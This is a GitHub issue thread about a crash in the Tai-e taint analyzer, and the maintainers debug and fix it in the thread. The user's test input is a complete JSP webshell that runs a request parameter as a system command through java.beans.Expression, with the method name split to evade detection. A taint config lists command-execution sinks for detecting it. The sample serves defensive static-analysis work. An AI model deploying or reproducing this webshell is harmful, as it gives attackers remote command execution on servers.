### ISSUE TITLE
Taint analysis transfers throw IndexOutOfBoundsException

### ISSUE THREAD

**Issue by struce2** [pascal-lab/Tai-e#31] opened 2023-02-14 08:34 UTC
### Describe the bug

When analyzing the program, Tai-e throw a java.lang.IndexOutOfBoundsException, here is the stack traceback of the reported error.

<img width="1016" alt="image" src="https://user-images.githubusercontent.com/17916470/218676227-6a049e21-26ac-433b-ac50-689587442f3c.png">

This is the site information before the error, hope it can provide you with some help.

<img width="1305" alt="image" src="https://user-images.githubusercontent.com/17916470/218682319-02609de7-8270-439e-a822-a32f7ac50013.png">

callSite's invokeExpr points to "newInstance" instead of "<init>"， this does not look as expected?

Here is my jsp code
```jsp
<%@ page import="java.beans.Expression" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.InputStream" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%--
使用Expression类实现JSP Webshell
--%>
<%


    String cmd = request.getParameter("ladypwd");
    Expression expr = new Expression(Runtime.getRuntime(), "e"+"x"+"e"+"c", new Object[]{cmd});
    Process p = (Process)expr.getValue();
    InputStream is = p.getInputStream();
    StringBuilder sb = new StringBuilder();
    BufferedReader br = new BufferedReader(new InputStreamReader(is));
    String line;
    while((line = br.readLine()) != null) {
        sb.append(line).append("\n");
    }
    out.print("<pre>");
    if (sb.length() > 0) {
        out.print(sb.toString());
    }
    out.print("</pre>");
%>

```

### Tai-e arguments

`cmdline` 
```bash
--input-classes=org.apache.jsp.bf6wgpw0qqyy9orw316ihzckb5xf7qo1,javax.servlet.http.HttpServletResponseWrapper,javax.servlet.http.HttpServletRequestWrapper
-java
8
-scope
APP
-ap
-a
pta=action:dump;action-file:dumpfile;taint-config:src/test/resources/pta/taint/taint-config.yml;only-app:false;implicit-entries:false
-cp
/path/to/javax.servlet-api-4.0.1.jar:/path/to/compiler_dir
```

The compiler_dir you can download the attachment.

[compiler.zip](https://github.com/pascal-lab/Tai-e/files/10730347/compiler.zip)

`TaintConfig`
```yml
sources:
  - { method: "<javax.servlet.ServletRequest: java.lang.String getParameter(java.lang.String)>", type: "java.lang.String" }
  - { method: "<javax.servlet.ServletRequestWrapper: java.lang.String getParameter(java.lang.String)>", type: "java.lang.String"}

sinks:
  - { method: "<java.lang.Runtime: java.lang.Process exec(java.lang.String)>", index: 0 }
  - { method: "<java.lang.ClassLoader: java.lang.Class defineClass(byte[],int,int)>", index: 0}
  - { method: "<java.beans.Expression: java.lang.Object getValue()>", index: base}

transfers:
  - { method: "<java.beans.Expression: void <init>(java.lang.Object,java.lang.String,java.lang.Object[])>", from: 2, to: base, type: "void"}
```

### Runtime environment infomation

OS: macOS Monterey 12.6
IDE: IntelliJ IDEA 2022.2.1 (Ultimate Edition)
Tai-e version: commit [3f1f27d](https://github.com/pascal-lab/Tai-e/tree/3f1f27dfa371e52ee01cbd4b9ad04966a0613021)
Java Version: 
```
openjdk version "17.0.3" 2022-04-19 LTS
OpenJDK Runtime Environment Zulu17.34+19-CA (build 17.0.3+7-LTS)
OpenJDK 64-Bit Server VM Zulu17.34+19-CA (build 17.0.3+7-LTS, mixed mode, sharing)
```

**Comment by struce2** [comment] 2023-02-14 08:44
What I expect is that if the third argument of the Expression constructor is a taint, then pass the taint to expr, and when expr calls getValue, if expr is a taint, then the taint flow should be found

**Comment by silverbullettt** [comment] 2023-02-14 08:57
It looks like the problem is in configuration
`- { method: "<java.beans.Expression: void <init>(java.lang.Object,java.lang.String,java.lang.Object[])>", from: 2, to: base, type: "void"}`

`void` is return type, not base type. The base type is `java.beans.Expression`.

**Comment by struce2** [comment] 2023-02-14 09:17
Thanks, there is no more problem, but a new problem seems to have appeared, the program doesn't exit anymore, it looks like a dead loop.

This is an IDE capture of the profiler's CPU and memory usage.

<img width="1104" alt="image" src="https://user-images.githubusercontent.com/17916470/218689556-6576a7a1-002d-4969-b7fb-b9e490a6810a.png">

More info:

<img width="1478" alt="image" src="https://user-images.githubusercontent.com/17916470/218691386-b4dd542e-aab3-4ff0-a254-7c26e23bbd7d.png">

<img width="1474" alt="image" src="https://user-images.githubusercontent.com/17916470/218691491-11e57f80-3be6-48ac-9878-ba008f2eaf64.png">

I will continue to check it out.

**Comment by struce2** [comment] 2023-02-14 10:21
Sorry, the above statement is wrong, it looks like there is a dead loop because I added the parameter `cs:1-obj`, when I changed it to `cs:ci`there is no problem, it may simply be slow.

But it still throws an IndexOutOfBoundsException error, even if I change `void` to `java.beans.Expression`.

**Comment by struce2** [comment] 2023-02-14 10:22
TaintConfig
<img width="1311" alt="image" src="https://user-images.githubusercontent.com/17916470/218707788-7b21ad3b-65f6-4081-95dd-2c26d257c8f1.png">

**Comment by struce2** [comment] 2023-02-14 10:31
When `cs:1-obj` is specified, it runs out of memory and exits (4G+), is this because it needs more memory?

`cs:1-call` and `cs:1-type` are fine (will throw an IndexOutOfBoundsException), not sure if this is as expected.

**Comment by silverbullettt** [comment] 2023-02-14 10:38
I guess the cause is that currently taint analysis cannot properly handle reflective calls to the transfer methods.

Could you please try to add following code to the beginning of pascal.taie.analysis.pta.plugin.taint.TaintAnalysis#onNewCallEdge(Edge)?
```java
if (edge.getKind() == CallKind.OTHER) {
    return;
}
```

**Comment by silverbullettt** [comment] 2023-02-14 10:47
> When `cs:1-obj` is specified, it runs out of memory and exits (4G+), is this because it needs more memory?
> 
> `cs:1-call` and `cs:1-type` are fine (will throw an IndexOutOfBoundsException), not sure if this is as expected.

`1-obj` is consumes more memory than `ci` and `1-type`. As for `1-obj` vs `1-call`, it depends on the program being analyzed. You could try `2-type`, which is more precise while being efficient.

**Comment by struce2** [comment] 2023-02-14 10:59
> I guess the cause is that currently taint analysis cannot properly handle reflective calls to the transfer methods.
> 
> Could you please try to add following code to the beginning of `pascal.taie.analysis.pta.plugin.taint.TaintAnalysis#onNewCallEdge(Edge)`, and see if it works?
> 
> ```java
> if (edge.getKind() == CallKind.OTHER) {
>     return;
> }
> ```

Nice, is worked, thank you!

**Comment by struce2** [comment] 2023-02-14 11:03
When I specify `2-type`, the pointer analysis takes about 20s, and when I specify `1-obj`, it runs out of memory and exit.

This is the stack traceback at exit when `1-obj` is specified.

<img width="1415" alt="image" src="https://user-images.githubusercontent.com/17916470/218717709-2753f6ae-ab77-45a6-9a2a-400295d56d8a.png">

**Comment by struce2** [comment] 2023-02-14 11:05
> 
> `1-obj` consumes more memory than `ci` and `1-type`. As for `1-obj` vs `1-call`, it depends on the program being analyzed. You could try `2-type`, which is more precise while being fairly efficient.

When specify `2-type`, the pointer analysis takes about 20s, and when specify `1-obj`, it runs out of memory and exit.

This is the stack traceback at exit when `1-obj` is specified.

<img width="1415" alt="image" src="https://user-images.githubusercontent.com/17916470/218717709-2753f6ae-ab77-45a6-9a2a-400295d56d8a.png">

**Comment by silverbullettt** [comment] 2023-02-15 06:55
> > I guess the cause is that currently taint analysis cannot properly handle reflective calls to the transfer methods.
> > Could you please try to add following code to the beginning of `pascal.taie.analysis.pta.plugin.taint.TaintAnalysis#onNewCallEdge(Edge)`, and see if it works?
> > ```java
> > if (edge.getKind() == CallKind.OTHER) {
> >     return;
> > }
> > ```
> 
> Nice, is worked, thank you!

Now fixed in commit [efbf256](https://github.com/pascal-lab/Tai-e/commit/efbf256a358362e0ae7853ca053f9282be4ca70b).

**Comment by silverbullettt** [comment] 2023-02-15 06:56
> > `1-obj` consumes more memory than `ci` and `1-type`. As for `1-obj` vs `1-call`, it depends on the program being analyzed. You could try `2-type`, which is more precise while being fairly efficient.
> 
> When specify `2-type`, the pointer analysis takes about 20s, and when specify `1-obj`, it runs out of memory and exit.
> 
> This is the stack traceback at exit when `1-obj` is specified.
> 
> <img alt="image" width="1415" src="https://user-images.githubusercontent.com/17916470/218717709-2753f6ae-ab77-45a6-9a2a-400295d56d8a.png">

`1-obj` is generally not a good choice of context sensitivity as it is neither precise nor efficient.

**Closed** 2023-02-15 07:04 UTC

**Comment by cobragege** [comment] 2023-03-03 02:28
@struce2 hi guys, I've downloaded your compile dir, seems like compiled by the web container. is there a way pre compile without any web container? I am trying jasper...
